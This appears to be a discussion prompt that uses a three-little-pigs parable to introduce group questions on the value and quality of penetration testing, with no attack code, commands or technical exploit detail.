In a parallel universe, the big bad pen tester contracts with 3 little pigs inc. The first test the straw house gets knocked down rather fast. But 3 little pigs Inc. gets a report outlining the weaknesses in construction along with recommendations for improvement. The knocking down of the house was a mere simulation, and they are given an opportunity to add a layer to the network, of sticks. The next test the big bad pen tester has to huff and puff, and huff and puff again, simulating another network destruction. No harm is really done, so the process repeats, until a wall of bricks is built. Now the only big bad person able to get through has to really work at it, too much huffing and puffing, and decides to go rob the three little bears instead, using their APT, and eating their IP.

  • First question for the group, 3-5 minutes each, is penetration testing worth it, why or why not?
  • What benefits do you receive from a "good" penetration test, and what are the qualities of a "good" penetration test?
  • If someone were to give you a "penetration test", then run a couple of automated tools and provide the stock report, is this a bad thing in all cases?
  • If we don't test our defenses in a controlled experiment, how do we really know they work?
  • Lets say a penetration tester is conducting an internal penetration test, and finds out quickly that more than 50 servers have missing patches for vulnerabilities that lead to a reliable shell. What is the benefit of the penetration test from this point?